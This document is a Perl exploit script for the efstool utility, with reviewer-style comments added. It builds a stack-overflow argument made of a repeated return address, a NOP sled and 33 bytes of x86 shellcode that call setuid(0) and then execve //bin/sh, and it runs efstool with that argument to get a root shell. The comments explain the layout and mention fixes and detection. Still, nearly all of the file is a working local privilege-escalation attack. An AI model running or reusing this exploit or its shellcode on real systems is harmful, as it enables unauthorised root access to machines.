#!/usr/bin/perl 
# Another efstool exploit 

# Overview (reviewer annotation): this script builds one long string and
# passes it as the sole command-line argument to /usr/bin/efstool. The string
# is laid out as [repeated 4-byte address][NOP run][machine-code payload].
# NOTE(review): this presumably targets an unchecked copy of argv into a
# fixed-size stack buffer inside efstool; the vulnerable code itself is not
# shown here. The durable fix is a length check in efstool (and dropping any
# elevated-privilege bit it does not need), not anything in this file.

# Raw x86 machine code, 33 bytes. The two 0xcd 0x80 pairs are `int 0x80`
# system-call traps: the first is issued with AL=0x17 and EBX=0 (setuid(0) on
# Linux i386), the second with AL=0x0b (execve) after pushing the bytes of
# "//bin/sh" onto the stack.
# NOTE(review): a setuid(0) call only matters if the target runs with
# elevated privileges -- presumably efstool is installed setuid; confirm
# against the affected package.
$shell = 
"\x31\xc0\xb0\x17\x31\xdb\xcd\x80\x31\xc0\x50\x89". 
"\xe2\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89". 
"\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; 


# Hard-coded base address that is repeated through the first part of the
# string.
# NOTE(review): the value looks like a 32-bit Linux stack address; a fixed
# address like this depends on a predictable stack layout, which address
# space layout randomisation is meant to remove.
$ret =0xbfffe590; 
# Number of bytes filled with the repeated address (3000 / 4 = 750 copies).
$buf = 3000; 
# Size budget for the NOP-plus-payload region that follows the addresses.
$egg = 2000; 
# Single-byte x86 NOP used as padding in front of the payload.
$nop = "\x90"; 
# Adjustment added to $ret; stays 0 unless overridden below.
$offset = 0; 

# With exactly one command-line argument, use it as the offset. The value is
# not validated; it is only used numerically in the addition below.
if (@ARGV == 1) { $offset = $ARGV[0]; } 

# pack 'l' emits the sum as a 4-byte value in the host's native byte order.
$addr = pack('l', ($ret + $offset)); 
# First region: $buf bytes made of the packed address, 4 bytes per iteration.
for ($i = 0; $i < $buf; $i += 4) { 
$buffer .= $addr; 
} 

# Second region: $egg - length($shell) - 100 NOP bytes (2000 - 33 - 100 = 1867
# with the values above).
for ($i = 0; $i < ($egg - length($shell) - 100); $i++) { 
$buffer .= $nop; 
} 

# Payload goes last, directly after the NOP run. Total length with the values
# above is 3000 + 1867 + 33 = 4900 bytes.
$buffer .= $shell; 
# Replaces this Perl process with efstool. This is the one-argument form of
# exec, so Perl hands the string to the shell whenever it contains shell
# metacharacters; the binary data is not quoted in any way.
# Detection note: the resulting process start carries a single multi-kilobyte
# argument containing a long run of 0x90 bytes and non-printable data, which
# is visible to exec/argv auditing on the host.
exec("/usr/bin/efstool $buffer"); 

